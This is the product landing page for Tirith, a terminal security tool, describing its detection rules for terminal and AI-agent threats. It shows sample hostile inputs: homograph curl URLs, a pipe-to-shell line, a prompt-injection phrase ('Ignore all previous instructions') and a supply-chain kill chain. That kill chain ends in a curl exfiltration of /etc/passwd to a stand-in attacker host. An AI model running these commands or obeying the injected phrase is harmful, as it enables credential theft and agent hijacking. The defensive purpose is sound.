Tirith — Terminal Security
Terminal Security for the Modern Stack<br>Your browser would catch this.<br>Your terminal won't.<br>Tirith intercepts commands and pastes in your terminal, detecting homograph attacks, pipe-to-shell patterns, ANSI injection, credential leaks, data exfiltration, and 200+ other threats, in under 1ms.
glyph-inspector<br>$curl https://github.com/org/setup.sh<br>$curl https://gіthub.com/org/setup.sh
Get StartedView on GitHub<br>See it work
See It In Action<br>Click a scenario to see how Tirith responds.<br>Homograph AttackPipe to ShellBase64 DecodeData ExfiltrationClean Command
tirith — demo
What It Catches<br>208 detection rules across 29 threat categories, covering every angle of terminal and AI-agent attack surface.
Hostname & Homograph
HIGH<br>Homograph attacks, punycode, confusable characters, IDN spoofing<br>$ curl https://xn--github-2o5f.com/install.sh
Terminal Injection
CRITICAL<br>ANSI escapes, bidi overrides, zero-width and control characters<br>$ echo 'hidden\x1b[2Jmalicious'
Command Execution
CRITICAL<br>Pipe-to-shell, decode-execute, command substitution, and dangerous invocations<br>$ some_command | bash
Credential Detection
CRITICAL<br>API keys, tokens, private keys, and high-entropy secrets in input<br>$ export GITHUB_TOKEN=ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef
Supply Chain & Ecosystem
HIGH<br>Git, Docker, pip, npm, registries — package and supply-chain attack surface<br>$ git clone https://github.com/torvald/linux
Config Security
CRITICAL<br>AI config poisoning, prompt injection, and MCP server validation<br>$ IMPORTANT: Ignore all previous instructions
AI Config Drift
HIGH<br>Snapshot-diff changes to AI configs: hidden instructions and tool-use escalation<br>$ a `CLAUDE.md` that, since the snapshot, gained `` (added hidden directive → High)
Threat Intelligence
CRITICAL<br>Known-malicious packages, URLs, and IPs from the signed threat database<br>$ pip install malicious-pkg-example
Code Execution
HIGH<br>Executing from tmp/untrusted locations and dynamic or obfuscated execution<br>$ /tmp/installer
Contextual Safety
HIGH<br>Production cloud/k8s, labeled SSH hosts, IaC apply/destroy, and container exec<br>$ kubectl delete namespace payments
Hidden Content
HIGH<br>Hidden CSS/color text, comments, and notebook/HTML hidden instructions<br>$ a code cell whose source contains a U+200B zero-width space
Cloaking
HIGH<br>Servers returning different content to AI bots vs browsers
View all 208 rules across 29 categories
Supply Chain Is the New Attack Surface<br>TeamPCP compromised LiteLLM, Aqua Trivy, and Checkmarx in 5 days. No zero-day needed, just stolen credentials and commands your terminal happily executed.<br>Tirith won't stop a trojaned package from being installed. But it catches the payload before it does damage, cutting the blast radius at every stage of the kill chain.
Stage 1Initial Access
UNDETECTABLE<br>Attack<br>Stolen credentials used to push trojaned package<br>LiteLLM, Aqua Trivy, Checkmarx, all in 5 days
Tirith Response<br>Outside terminal scope. Tirith guards what runs after install.
Stage 2Credential Harvesting
BLOCKED<br>Attack<br>Payload exports API keys, tokens, and secrets from env vars<br>$AWS_SECRET_ACCESS_KEY, $GITHUB_TOKEN, $ANTHROPIC_API_KEY
Tirith Response<br>sensitive_env_export
Stage 3Memory Scraping
BLOCKED<br>Attack<br>Reads /proc/*/mem to extract secrets from running processes<br>Every secret in your CI runner or dev machine memory
Tirith Response<br>proc_mem_access
Stage 4Privilege Escalation
BLOCKED<br>Attack<br>Mounts host root filesystem via Docker remote daemon<br>Full host access from inside a container
Tirith Response<br>docker_remote_priv_esc
Stage 5Persistence
BLOCKED<br>Attack<br>Sweeps .aws/credentials, .ssh/id_rsa, .gnupg/ for lateral movement<br>Every credential file on disk
Tirith Response<br>credential_file_sweep
Stage 6Exfiltration
BLOCKED<br>Attack<br>Uploads stolen data to attacker-controlled server via curl<br>curl -d @/etc/passwd https://c2.attacker.com/collect
Tirith Response<br>data_exfiltration
5 of 6 kill chain stages intercepted<br>Tirith can't prevent a compromised package from being published. But every post-install payload (credential theft, memory scraping, privilege escalation, exfiltration) gets caught before it does damage. That's the difference between a breach and a blocked command.
How It Works<br>A 3-tier pipeline that balances speed with thoroughness.
Tier 1
Fast Gate<br>Regex-powered initial filter eliminates 99% of clean commands instantly.
Tier 2
Extract<br>URL + Refs<br>Parses URLs, Docker references, and package identifiers from complex commands.
Tier 3
Analyze<br>200+ Rules<br>200+ rules across 29 categories: homographs, injection, supply-chain, threat intel, credential detection, AI-config drift, and more.
AI Agent Security<br>Protect AI coding agents at every layer, from the configs they read to the skills they download to the commands they execute. One command to set up. Zero friction on clean input.
MCP Server: 7 Tools<br>AI agents call these tools before taking action. Run tirith mcp-server to start.
tirith_check_command<br>Analyze shell...